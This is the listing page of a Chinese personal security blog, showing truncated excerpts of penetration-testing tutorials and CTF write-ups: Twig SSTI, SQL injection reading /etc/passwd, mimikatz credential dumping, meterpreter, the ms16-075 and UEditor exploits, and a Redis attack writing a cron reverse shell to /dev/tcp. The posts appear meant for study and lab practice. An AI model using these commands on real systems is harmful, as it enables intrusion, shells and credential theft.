刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

MySQL开启远程访问权限

登录MySQLmysql -u root -p查询用户表use mysql;select  User,authentication_string,Host from user;这里可以看出host默认都是localhost访问权限。下一步:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456';%代表所有主机,也可以具体到你的主机ip地址,123456表示远程连接的

安恒2019年12月月赛 web waimai2 WriteUp(twig,ssti,模板注入,.DS_Store)

打开后发现只有3个静态页面,页面里有提示使用了twig模板引擎,但没有找到可利用的点,扫描发现有.DS_Store泄露使用工具(https://github.com/lijiejie/ds_store_exp)扫描发现其他路径访问http://118.190.161.193:8003/waimai/ 是个登录页面随便输入,点login使用bp测试,发现注入点找到一份外国资料,里面有payloadus-15-Kettle-Server-Side-Template-Injection-RC

在Metasploit下利用ms16-075提权

1.1.1 ms16-075漏洞简介及利用前提1.ms16-075漏洞简介Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此更新通过更正Windows服务

教你多姿势抓取Windows明文或Hash,快收藏!

渗透测试,可用于测试企业单位内网的安全性,而获取Windows的明文或Hash往往是整个渗透测试过程中重要的一环,一旦某台机器的密码在内网中是通用的,那么该内网的安全性将会非常糟糕。本期安仔课堂,ISEC实验室的李老师为大家介绍一些抓取Windows明文或Hash的方式。一、mimikatzmimikatz是一款轻量级的调试神器,功能非常强大,其中最常用的功能就是抓取明文或Hash。用法:mimikatz.exe "privilege::debug" "sekurl

后渗透之meterpreter使用攻略

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。0x01.系统命令1)基本系统命令sessions    #sessions –h 查看帮助 sessions -i <ID值>  #进入会话   

UEditor漏洞 任意文件上传漏洞POC与复现 2018 .net新版

UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。  百度的UEditor文本编辑器,近几年很少被曝出漏洞,事情没有绝对的,总会有漏洞,这次被曝出的漏洞是.ne

集成环境phpstudy后门利用复现

0x00 简介phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境0x01 漏洞概述使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门(来自雷神众测)0x02 影响版本phpStudy20161103版本:php5.4.45与php5.2.17phpStu

SA提权辅助

1.判断扩展存储是否存在:  select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'  select count(*) from master.dbo.sysobjects where name='xp_regread'  恢复:  exec sp_dropextendedproc 'xp

redis未授权漏洞和主从复制rce漏洞利用

 未授权无需认证访问内部数据库。利用计划任务反弹shell12345redis-cli -h 192.168.2.6set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n"config set dir /var/spool/cron/config set dbfilename rootsave获取webshel

XCTF 攻防世界 web进阶 comment WriteUp(代码审计,git泄露,sql注入)

git泄露python GitHack.py http://xxxxxxxx/.git根据提示去猜解爆破即可user:zhangwei pass:zhangwei666代码审计后发现注入点查询/etc/passwd : ',content=(select load_file('//etc/passwd')),/*闭合查询语句得到结果以此方法继续查询/bin/bash_history   :  ',content=(select loa

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.